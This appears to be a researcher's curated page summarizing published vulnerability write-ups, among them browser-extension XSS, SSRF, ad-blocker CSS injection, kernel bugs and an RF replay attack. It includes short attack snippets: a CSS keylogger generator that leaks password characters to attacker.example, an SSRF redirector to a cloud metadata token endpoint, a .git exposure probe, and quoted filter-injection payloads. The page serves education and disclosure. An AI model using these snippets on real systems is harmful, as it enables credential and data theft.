Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Proctorio Chrome extension Universal Cross-Site Scripting - 713

Sector 7    Reference → Posted 4 Years Ago
  • With the rise of online schooling, teachers needed to ensure students could not cheat during tests. One way to prevent cheating on tests is the Proctorio Chrome extension, which can view internet traffic, alter the page and do many other things.
  • The extension inspects the browser's web traffic. Depending on the paths configured by the administrator, it will inject content scripts into the page. Once a test has started, a toolbar is added with a number of buttons, such as a calculator.
  • When the = button is pressed, the computation is performed via the JavaScript eval() function. Since the input is never validated as a mathematical expression, we have XSS within the context of the Chrome extension.
  • XSS is already a serious vulnerability to find. In the context of a browser extension that can always be triggered, it turns into universal cross-site scripting. By sending a URL that matches the demo mode for the Chrome extension, the calculator can be invoked to get XSS in the extension.
  • The extension's content script does not have the full permissions of the extension, but major damage can still be done. Using the XSS, a request can be made that bypasses the same-origin policy and returns arbitrary data. For instance, an attacker could steal emails from an inbox, or anything else on any website that is visited. Damn, that is a real bad bug!
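
The bug class here is language-agnostic. A minimal Python sketch (hypothetical code, not Proctorio's actual calculator) shows why evaluating calculator input with eval() hands out code execution, and what a validated version could look like:

```python
import ast

# Hypothetical eval-based calculator, analogous to the extension's "=" button.
def calculate(expression: str):
    # BUG: nothing ensures `expression` is purely arithmetic.
    return eval(expression)

# Validated version: parse first, and only allow literal arithmetic nodes.
def safe_calculate(expression: str):
    tree = ast.parse(expression, mode="eval")
    allowed = (ast.Expression, ast.BinOp, ast.UnaryOp,
               ast.Constant, ast.operator, ast.unaryop)
    for node in ast.walk(tree):
        if not isinstance(node, allowed):
            raise ValueError("not a pure arithmetic expression")
    return eval(compile(tree, "<calc>", "eval"))

print(calculate("2 + 3 * 4"))                   # 14
print(calculate("__import__('os').getcwd()"))   # runs arbitrary code!
print(safe_calculate("2 + 3 * 4"))              # 14
# safe_calculate("__import__('os').getcwd()")   # raises ValueError
```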

NotLegit: Azure App Service vulnerability exposed hundreds of source code repositories - 712

Shir Tamari - Wiz.io    Reference → Posted 4 Years Ago
  • Azure App Service is a cloud computing platform for hosting websites and web applications. The service is meant to make deploying code quick and easy. The code can be pulled via SSH, GitHub or other sources.
  • A classic website misconfiguration is accidentally exposing sensitive files in the web root of the server. The .git folder falls squarely into this category of sensitive files.
  • .git holds all of the information about a Git repository, from the first commit to the most recent. By gaining access to this directory, it is possible to recover the entire source code of the application!
  • Source code may have hardcoded passwords, important intellectual property and many other sensitive pieces of information. Being able to steal the source code is a terrible vulnerability.
  • The mitigation Azure App Service implemented was to add rules to web.config. Since web.config is only honored by C#/IIS applications, the mitigation only worked for C# applications. As a result, PHP, Ruby, Python and Node deployments using Apache, Nginx, Flask and many other stacks were still vulnerable to this attack.
  • This vulnerability is incredibly simple and I am astonished it went unnoticed for 4 years (since 2017). As an attacker, I would rather be lucky than good!
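
As a concrete illustration of the bug class, here is a hedged Python sketch of how one might probe for an exposed .git directory: fetch /.git/HEAD and look for the telltale contents. The URL handling is illustrative; real tooling then walks the object database to reconstruct the full repository.

```python
from urllib.request import urlopen

def looks_like_git_head(body: bytes) -> bool:
    # A real .git/HEAD is either a symbolic ref ("ref: refs/heads/main")
    # or a bare 40-hex-char commit hash (detached HEAD).
    text = body.strip()
    if text.startswith(b"ref: refs/"):
        return True
    return len(text) == 40 and all(c in b"0123456789abcdef" for c in text)

def git_dir_exposed(base_url: str) -> bool:
    # Probe the web root for /.git/HEAD.
    try:
        body = urlopen(base_url.rstrip("/") + "/.git/HEAD", timeout=5).read()
    except OSError:
        return False
    return looks_like_git_head(body)
```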

SSRF vulnerability in AppSheet - Google VRP - 711

David Nechuta    Reference → Posted 4 Years Ago
  • Google AppSheet is a no-code app generator. While looking around at its functionality, the author found a section called Workflows, which makes it possible to automate app behavior via rules. One of these options was a webhook.
  • Since these hooks required a URL, they supplied an internal URL to try to steal the metadata information from the instance, which would include keys for the box. However, they ran into a problem: they needed to make a GET request, while the application only supported POST/PUT requests.
  • To get around this problem, they made the request to a separate website that they controlled. In the response, they sent a 301 redirect that changed the URL to the internal one and the request method to GET. Amazingly enough, this worked for getting back the access token!
  • It turns out that the API would accept a POST or GET request, which made the shenanigans above unnecessary. Try the stupid simple thing first!
  • The fix was to disable the legacy metadata API, which the author had originally used in their exploit. Additionally, the Metadata-Flavor header was banned; since it is required for the request, this made the SSRF unexploitable. However, the webhook could add custom headers, and they found an alternative header that could be used to trigger the metadata request: X-Google-Metadata-Request.
  • Overall, good read with some neat SSRF tricks!
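
The redirect trick is easy to reproduce. Below is a hedged Python sketch of the attacker-side server: whatever method the webhook uses, it answers with a 301 pointing at the (assumed) GCP metadata token URL, and most HTTP clients will follow a 301 with a GET. Port and paths are illustrative.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed GCP metadata token endpoint; only reachable from inside the instance.
METADATA_URL = ("http://169.254.169.254/computeMetadata/v1/instance/"
                "service-accounts/default/token")

class Redirector(BaseHTTPRequestHandler):
    def _redirect(self):
        # 301 changes the target URL; many clients also downgrade POST to GET.
        self.send_response(301)
        self.send_header("Location", METADATA_URL)
        self.end_headers()

    do_GET = do_POST = do_PUT = _redirect

    def log_message(self, *args):  # keep the demo quiet
        pass

# Usage (blocking): HTTPServer(("0.0.0.0", 8080), Redirector).serve_forever()
```

A 301/302 downgrading POST to GET is long-standing de facto client behavior; 307/308 exist precisely to preserve the method.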

uBlock, I exfiltrate: exploiting ad blockers with CSS - 710

Gareth Heyes - PortSwigger    Reference → Posted 4 Years Ago
  • uBlock Origin is a popular ad blocker. It works from community-provided filter lists, which use CSS selectors to determine which elements to block. Since these lists are not entirely trusted, they need to be constrained from running arbitrary CSS. So, is there a way around this? That is what this post is all about! Major S/O to Zi on DayZeroSec for explaining and diving deeper into how these work.
  • The research all started from a Tavis Ormandy post on CSS injection. The payload looks like the following:
    example.com##div:style(--foo: 1/*)
    example.com##div[bar="*/;background-image: url(https://google.com);}/*"]
    
    The key to this is the /*, which opens a CSS comment. By opening the comment in one filter, then closing it in another, the CSS selector can be escaped to inject arbitrary CSS.
  • The vulnerability above was patched by adding a check that disallows opening or closing comments when operating on styles. To bypass this security check, simply open a comment NOT in the styles to trigger the same CSS injection bug as before; blocking the comment there was just not enough. The POC is shown below:
    ##input,input/*
    ##input[x="*/{}*{background-color:red;}"]
    
  • The fix for this was more global in scale, instead of denylisting a few characters. Rather than trying to detect bad selectors in code, they use an actual style sheet to validate that the filter cannot inject anything: if the filter injects into the style sheet, the program will now catch it. It is awesome to see a global fix to this problem!
  • After this, the author decided to see if the cosmetic filters functionality, which allows for powerful CSS selectors, could be bypassed. The same trick of opening a comment on one line and closing it on another allowed a payload to be smuggled in as well. This payload worked because the validation code, built on document.querySelector, allowed invalid syntax. This was fixed by checking for opening and closing comments in the rules.
  • At this point, the obvious attack vectors were gone, with the comments running out of life. Gareth Heyes decided to fuzz what was and was not allowed in CSS. He noticed that a CSS selector can also use curly braces to add more functionality inside of it. On top of that, if there is no closing curly brace for the selector, a semicolon will NOT start a new rule. Instead, TWO selectors get added to the stylesheet from one filter, smuggling one in.
  • Why this is possible is better explained in the DayZeroSec episode mentioned above. The patch limits the number of CSS style declarations added, to catch a smuggled one (as above). However, the vulnerable code path only ensures that a non-zero value is returned, which leaves a lot of wiggle room: when something is smuggled in, more than one (such as two) selectors could be added.
  • The patch for this was to prevent all smuggled-in selectors from being used by adding a specific check that the number of added selectors is exactly 1. Failing closed as opposed to failing open makes a big difference in security-sensitive operations such as this one! The POC for this exploit is shown below (notice the missing curly brace):
    *#$#* {background:url(/abc);x{  background-color: red;}
    
  • The final bypasses were specific to different browsers. While the powerful url() was blocked from usage in the CSS, some browser-specific functions were not. In Chrome, image-set could be used to exfiltrate data using only CSS.
  • With CSS injection, how do you do anything useful? Obviously you can alter the page for phishing, but can you steal data? Using attribute-based selectors, it is easy to steal information. The author creates a CSS keylogger, which could be used to steal passwords and other sensitive information. They even found a way to steal the first N characters of a value using selectors in Firefox.
  • To top it off, they found a JavaScript URI injection into a list. But the strong CSP used by uBlock Origin made it impossible to exploit. Overall, a few good takeaways:
    • Fix classes of bugs by addressing the root cause of the problem. This was done multiple times by the uBlock Origin team throughout this process.
    • Fuzzing formats can be useful when trying to smuggle in data. Gareth Heyes has done this in a few other cases with great results!
    • Allowlists are much better than denylists! Banning certain functions will lead to somebody finding a new one to use and bad error checks will always be exploited.
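
To make the exfiltration step concrete, here is a hedged Python sketch that generates the kind of attribute-selector CSS a keylogger relies on: one rule per guessed next character, each pointing at a unique attacker URL (the endpoint and input name are made up for illustration):

```python
# Generate CSS that leaks the next character of an input's value attribute:
# value^= matches a prefix, and the matching rule's url() fetch tells the
# attacker which character came next.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"

def exfil_rules(known_prefix: str,
                endpoint: str = "https://attacker.example/leak") -> str:
    rules = []
    for ch in ALPHABET:
        guess = known_prefix + ch
        rules.append(
            'input[name="password"][value^="%s"] '
            '{ background: url(%s?v=%s); }' % (guess, endpoint, guess)
        )
    return "\n".join(rules)

print(exfil_rules("s3c").splitlines()[0])
```

Whichever rule matches fires a request, leaking one more character; the attacker then regenerates the rules with the longer prefix.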

USB Over Ethernet | Multiple Vulnerabilities in AWS and Other Major Cloud Services - 709

Kasif Dekel - SentinelOne    Reference → Posted 4 Years Ago
  • Amazon WorkSpaces is a fully managed, persistent desktop virtualization service that enables users to access the data, applications and resources they need anywhere, from any supported device. Session information is handled via HTTPS, but the stream is handled via PCoIP or WSP (WorkSpaces Streaming Protocol). WSP uses many third-party libraries to make the virtual PC feel more physical than it really is, such as USB Over Ethernet by the Eltima SDK.
  • USB redirection is done by the Eltima SDK. The Kernel IO Manager (IOMgr) controls the flow of information between kernel and user mode. When a user-mode request is sent via an IRP_MJ_DEVICE_CONTROL request, the input and output data depend on the IOCTL code that is invoked. The control code is a 32-bit value with several fields, including TransferType.
  • This field indicates how the NtDeviceIoControlFile syscall will pass data. There are three different modes: METHOD_BUFFERED, METHOD_IN/OUT_DIRECT and METHOD_NEITHER. The first copies the caller's input data into a system buffer. The second supplies a memory descriptor list (MDL) and ensures that the calling thread has access to the memory. The final one takes a user-mode address and reads/writes through it with no validation. Of course, the driver uses the insecure METHOD_NEITHER.
  • METHOD_NEITHER by itself is NOT secure: the IOCTL handler is responsible for validating, probing, locking and mapping the buffer, depending on the use case. Because of this, double fetches, TOCTOUs, bad pointer dereferences and other vulnerabilities may be exploitable. Although this is not a vulnerability by itself, it is a code smell that should be checked out.
  • While reviewing the handler code for these IOCTLs, the author noticed that the size parameter from the user request was blindly trusted. Later on, this size was used in a multiplication that could easily overflow. Additionally, the copy operation was never verified to be smaller than the allocation!
  • The proof of concept has an allocation size and a copy size. To exploit this, they set the allocation size to be smaller than the copy size. Then, when the copy happens, a trivial buffer overflow occurs with the user-controlled write value. Since the data and size are both controlled, this is a highly exploitable vulnerability.
  • An additional point of concern is that the IOCTL does not have any ACL enforcement turned on. This means the vulnerability can be triggered via several different mediums, such as the browser (if it didn't do its own filtering).
  • In the disclosure timeline, everything seems fairly normal except for the vendor that created the library. They claimed to have known about the bug, but said it was not possible to hit the code path because the feature was turned off. After a back-and-forth discussion, Eltima eventually pushed a new build with the vulnerabilities fixed. It's not a bug, it's a feature!
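
The arithmetic at the heart of the bug is easy to model. A hedged Python sketch (illustrative values, not the driver's actual fields) of a 32-bit count * element_size computation that wraps, leaving the copy larger than the allocation:

```python
MASK32 = 0xFFFFFFFF

def alloc_size(count: int, elem_size: int) -> int:
    # Kernel-style 32-bit multiplication: the product silently wraps.
    return (count * elem_size) & MASK32

count, elem_size = 0x40000001, 0x10
size = alloc_size(count, elem_size)   # wraps to a tiny allocation
copy_size = count * elem_size         # what the copy loop actually moves

print(hex(size))          # 0x10 -- the allocation is only 16 bytes
print(copy_size > size)   # True -- the copy overflows the buffer
```

A safe handler would reject the request whenever count exceeds (2**32 - 1) // elem_size before allocating anything.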

Local Escalation of Privilege Ubuntu Desktop - 708

Flatt Security     Reference → Posted 4 Years Ago
  • eBPF (extended Berkeley Packet Filter) is a Linux kernel feature that allows code to run in the context of the kernel without gaining further privileges. To make this safe, there is a verification step that ensures all of the program's actions are memory safe. Because it runs in the kernel, it is faster than running in userspace.
  • eBPF has many different map data types, one of them being a ring buffer (circular queue). When creating the file descriptor, two dynamic memory allocations are made: one for the bpf_ringbuf_map and the other for the bpf_ringbuf.
  • bpf_ringbuf_map contains a pointer to the bpf_ringbuf. bpf_ringbuf contains consumer and producer positions plus page-aligned data, where the data memory is mapped twice to give the ring-buffer feel. In eBPF bytecode, reserving space in the buffer is essentially a call to malloc in the eBPF world, but the size has to be a static value. The verifier knows this value because it is passed in as a const during the verification process.
  • The size of an allocation should not surpass the value passed to the verifier; this is the key to the bounds checking. The main runtime check relies on the consumer and producer positions in the buffer: it verifies that producer position minus consumer position is less than the size of the buffer. This makes sense but has a terrible flaw in it.
  • The vulnerability comes from the fact that the buffer's positions can be mmapped directly by userspace and are not validated after alteration. The main check mentioned above can then be manipulated to pass by altering the producer and consumer position values, so that an eBPF allocation becomes much too large for the memory backing it. This leads to an out-of-bounds read and out-of-bounds write in the kernel.
  • With this primitive, the exploit strategy is fairly straightforward for the kernel. First, they create read and write functions to abstract away the vulnerability above and worry only about exploitation. eBPF has many protections in place to prevent exploitation, which limited the functionality that could be used in this exploit.
  • The author allocates two adjacent bpf_ringbuf structures and a kernel stack for exploitation. This is achieved by creating huge maps and then spawning a bunch of processes. Eventually, this lines up the way the attacker wants. Once the memory feng shui is done, the out of bounds read can be used to leak kernel pointers from the bpf_ringbuf object.
  • Once the randomness has been broken, the kernel instruction pointer on the stack can be overwritten to start a ROP chain. Since this stack belongs to another process, that process needs to be paused while the full exploit happens; this is done by having it call the read syscall and wait for a write to the buffer. With a full ROP chain set up from user-controllable values via the primitive above, popping a root shell is trivial.
  • One thing to note is that the read syscall's stack does not have to be adjacent to our block: the out-of-bounds read can be used to scan memory until the kernel address where read's return lives is found. That is super neat and takes out a lot of the system randomness.
  • Overall, this was a super interesting vulnerability in the Linux kernel! Verifying running code is extremely hard to do. Even with all of the effort and mitigations in place, eBPF has been a security problem for a while now. This shows that deeply understanding a code base allows for the discovery of vulnerabilities :)
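
The flawed check can be modeled in a few lines. This is a hedged toy model (not kernel code): the availability check trusts consumer_pos, but that value lives in memory userspace can mmap and rewrite:

```python
MASK64 = (1 << 64) - 1  # unsigned long arithmetic

def reserve_ok(producer_pos: int, consumer_pos: int, buf_size: int) -> bool:
    # Simplified version of the producer/consumer availability check.
    used = (producer_pos - consumer_pos) & MASK64
    return used < buf_size

BUF_SIZE = 0x1000
# Honest state: the buffer is full, so a new reservation is refused.
print(reserve_ok(0x1000, 0x0, BUF_SIZE))    # False
# Attacker advances consumer_pos via mmap without consuming anything;
# the same full buffer now passes the check, and the producer writes
# past the memory actually backing it.
print(reserve_ok(0x1000, 0x800, BUF_SIZE))  # True
```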

Making it rain with Software Defined Radio - 707

RK - Spurious Emissions    Reference → Posted 4 Years Ago
  • This post starts with a device the author wants to hack: a wireless weather station with a temperature sensor. They knew it used some custom protocol to communicate the temperature to the base station, but did not know how.
  • The author had an RTL-SDR and an Adalm-Pluto. The Adalm-Pluto is an Analog Devices (the company) branded, education-level SDR. It has 20MHz of bandwidth, a 12-bit ADC & DAC, full duplex, GNU Radio blocks and a range of 325MHz-3.8GHz. These, along with the tool Universal Radio Hacker (URH), were great starting points for this project.
  • The device itself had its carrier frequency labeled on it: 915MHz. When viewing this on a spectrum analyzer, there were two peaks. Two distinct peaks indicate binary (0,1) frequency shift keying (FSK) being used to communicate the data. From the spectrum analyzer, the temperature was communicated every 12 seconds on the dot.
  • The author absolutely abuses Universal Radio Hacker for this project. The tool automatically decoded the symbol rate, samples per symbol and the modulation type (obviously FSK). From there, they took a bunch of recordings with the device in several different locations, such as the freezer, at specific temperatures.
  • Once they had 10-ish recordings, they began to analyze the protocol and realized URH had done the automatic decoding wrong, which led them down a path of manually calculating some of the parameters. Eventually, they got data that looked consistent enough to really attempt to decode.
  • The protocol had two beginning portions: a preamble of A nibbles (0xA = 0b1010), then a sync word to sync up the timings once everything had completely powered on. It is common in a lot of RF communications to have both of these values. The middle portion contained slightly varying values that appeared to be the temperature. Finally, there were two values at the end that they were unsure of, but were likely a CRC.
  • The payload was binary coded decimal (BCD) digits shifted by a -40C offset. They found out this is common practice by googling, since the initial values were confusing. The -40 offset exists so that negative temperatures never require sending negative numbers.
  • What about the CRC? The author tried the built-in CRC tooling in URH with all the different parameters but did not get anywhere. They tried online tools, but nothing checked out. Eventually, they ran into a project called CRC RevEng which, given enough inputs, will find the proper parameters for the CRC check. Neat!
  • After doing all of this work, they noticed a simple replay attack worked. Even cooler, in URH they could change the temperature information in the signal and the CRC would automatically be updated. Once this was done, URH could be used to transmit the signal to the weather station. Cloudy with a chance of pwnage!
  • The author had some issues making this work on other devices, though. Eventually, they figured out what the 8th and 9th nibbles were: a synchronized time slot for transmitting from the thermometer to the base station. There were 256 possible timings, chosen at bootup; this allowed the station to ONLY listen at that interval and sleep otherwise.
  • The two-channel mode just used a different timing interval. Besides this, everything was exactly the same as the previous protocol. Overall, I really appreciated the article, with practical knowledge on using URH, the CRC repo and protocol reverse engineering in general. Good work mate!
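
The payload encoding is simple enough to reconstruct. A hedged Python sketch of the BCD-with-offset scheme (digit positions are illustrative; the real frame also carries a preamble, sync word, timing nibbles and CRC):

```python
def decode_temp(nibbles):
    """Three BCD digits encoding (temp_c + 40) * 10."""
    value = nibbles[0] * 100 + nibbles[1] * 10 + nibbles[2]
    return value / 10.0 - 40.0

def encode_temp(temp_c):
    """Inverse: shift by +40 C so no sign bit is ever needed."""
    value = round((temp_c + 40.0) * 10)
    return [value // 100, (value // 10) % 10, value % 10]

print(decode_temp([6, 5, 3]))   # 25.3 C
print(encode_temp(-7.5))        # [3, 2, 5] -- negative temps stay positive
```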

Understanding the Root Cause of CVE-2021-21220 - 706

Hossein Lotfi - ZDI    Reference → Posted 4 Years Ago
  • The gap between what is assumed and what actually happens causes some of the biggest bugs around! This blog post digs into a difference between how the optimizer sees code and how the code is actually represented in Chromium.
  • The proof of concept is literally 6 lines of code, which is absolutely wild for a JavaScript 0-day. The first part of the bug is in InstructionSelector::VisitChangeInt32ToInt64, which converts a 32-bit integer into a 64-bit integer by either sign-extending or padding the value with 0s.
  • While dealing with optimizations, the exploiteers found an edge case: if a value is XORed with 0, the optimizer can PROVE the output equals the original value. If this is true, the XOR operation can be entirely removed from the code during the optimization phase.
  • Here is where everything perfectly collides: the new value from the optimization is now UNSIGNED, even though it should be SIGNED. When this case is hit with an unsigned number, the value changes after the optimization. This unsigned-to-signed problem creates a type confusion which is likely exploitable.
  • In the POC, the original value is -2^32 and the JITed value is 2^32, demonstrating the mismatch between the expected and actual representation of the value. The authors also include a substantial amount of debugging information in this post, which may be useful if you are getting into Chromium hacking.
  • In a follow-up article, they actually exploit this bug. How can a simple bad JIT interpretation turn into RCE? Let's find out!
  • Previously, turning a bad numeric result into an OOB read/write was done by abusing the array bounds check elimination optimization. However, that optimization was removed because of how often it was exploited. The authors found a newer strategy, mentioned at Pwn2Own 2020, abusing ArrayPrototypePop and ArrayPrototypeShift.
  • Array.shift removes the first element from the array, returns the removed element, then computes the new size of the array by subtracting one. By using the original vulnerability for the length of an array, the confusion is created: running Array.shift makes the length of the array become -1, since there is no bounds check at this point in the optimization, as everything is supposed to already be safe.
  • Since the subtraction leads to an integer underflow of the length, the array now appears to have infinite size. This means we have a relative read/write over the entire memory space, which they use to create addrof (address of) and fakeobj (fake object) primitives.
  • After creating the primitives, they use them to leak the address of a wasm function they created. Since the wasm code lives in executable memory, shellcode can be written over it with the write primitive and run by calling the function, completing the chain to RCE.
  • Overall, a good series of posts on modern browser exploitation. It is absolutely wild how complex these issues are becoming, yet they are still weaponizable.
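
The root-cause mismatch is easy to demonstrate outside the JIT. A hedged Python sketch of sign- versus zero-extension of the same 32-bit pattern, plus the unsigned length wrap that makes the Array.shift step work:

```python
def sext32(v: int) -> int:
    """Sign-extend a 32-bit value to 64 bits (the correct semantics)."""
    v &= 0xFFFFFFFF
    return v - (1 << 32) if v & 0x80000000 else v

def zext32(v: int) -> int:
    """Zero-extend a 32-bit value (what the optimized code effectively did)."""
    return v & 0xFFFFFFFF

x = 0x80000000                # INT32_MIN's bit pattern
print(sext32(x))              # -2147483648
print(zext32(x))              # 2147483648 -- the two disagree by 2**32

# The same class of mismatch powers the Array.shift step: a length of -1
# stored as an unsigned 32-bit value reads back as an enormous length.
print(zext32(-1))             # 4294967295
```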

refcount increment on mid-destruction file - 705

Jann Horn - Project Zero (P0)     Reference → Posted 4 Years Ago
  • ep_loop_check_proc tries to increment the reference count of a file in the Linux kernel via a call to get_file(). However, get_file() does not do the proper sanity checks on the file prior to access: only get_file_rcu() does.
  • In the epoll Linux subsystem, this becomes a problem because ep_loop_check_proc only has a weak reference to the file. Since this weak reference is NOT enough to keep the file from being deleted, it can be deleted while ep_loop_check_proc is still using it. This creates a use after free on the object, though the author of the post labels it as an object state confusion bug.
  • The vulnerability was introduced while trying to fix another reference-counting vulnerability. That patch attempted to validate that, when adding a new fd to epoll, deletion does not occur concurrently. The attempted fix was to check the reference count of the file via get_file, which is where the bug was introduced.
  • Fixing concurrency bugs is incredibly hard! There are so many ways for an object to be affected and it is hard to consider all of the cases for this. Good bug find!
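
The difference between the two helpers can be illustrated with a small Python analogy (a model of the pattern, not kernel code; the real get_file_rcu uses an atomic increment-if-not-zero):

```python
class File:
    def __init__(self):
        self.refcount = 1

def get_file(f):
    # Blindly bumps the count -- even if the object is mid-destruction.
    f.refcount += 1
    return f

def get_file_rcu(f):
    # Checked variant: refuse once the count has already hit zero.
    if f.refcount == 0:
        return None
    f.refcount += 1
    return f

f = File()
f.refcount -= 1              # last real reference dropped; teardown begins
print(get_file_rcu(f))       # None -- correctly refuses the dying file
print(get_file(f).refcount)  # 1 -- "resurrects" it; in the kernel, a UAF
```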

Insecure Handling of Bind Mount Sources - 704

Fwilhelm - Project Zero (P0)     Reference → Posted 4 Years Ago
  • runc and libcontainer are what make Docker, Docker. They handle the chroot, namespaces and everything else in between, while Docker adds a nice wrapper around all of this to make it more practical to use and install things. runc is written in Go, while parts of the low-level container setup are written in C.
  • The interface between C and Go is an important one to consider. A non-issue in Go may be a terrible issue in C if things are not handled properly; differences between languages can make a big difference! When runc communicates the bind mounts via a Go-to-C call, the Go string can have embedded null bytes inside of it.
  • The messages between the Go and C code, used to communicate the bind mounts above, are separated by null bytes. As a result, a bind mount source with an embedded NULL byte created a message smuggling bug. One way to exploit this would be to bypass hostPath restrictions in Kubernetes clusters.
  • When sending a message from Go to C, there are two fields: a uint16 for the length of the message and a byte[] for the bytes themselves. Even though this looks totally fine, the length can be overflowed! This results in another smuggling bug, since we can now control message framing in ways we should not be able to.
  • Using the bugs together, it is possible to craft an arbitrary message. Such a message could do malicious things, such as specifying the CLONE_FLAGS_ATTR for the container, giving it access to the host namespace.
  • Interfacing with other languages can be complicated because of the inherent differences in the representation of data. Additionally, integer overflow issues exist in all languages. So, watch out world!
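
Both framing bugs are easy to model. A hedged Python sketch (the real protocol's framing is simplified here) of null-byte message smuggling and the uint16 length truncation:

```python
import struct

def frame_messages(messages):
    # Bug 1: messages are joined with NUL separators, so a NUL *inside* a
    # message is indistinguishable from a separator on the receiving side.
    return b"\x00".join(m.encode() for m in messages)

def parse_messages(wire: bytes):
    return wire.split(b"\x00")

# One "bind mount source" smuggles a second message:
wire = frame_messages(["/safe/path\x00/host/etc/shadow"])
print(parse_messages(wire))   # [b'/safe/path', b'/host/etc/shadow']

# Bug 2: a uint16 length header silently wraps for large payloads.
payload_len = 65536 + 10
header = struct.pack("<H", payload_len & 0xFFFF)   # truncated to 10
print(struct.unpack("<H", header)[0])              # 10, not 65546
```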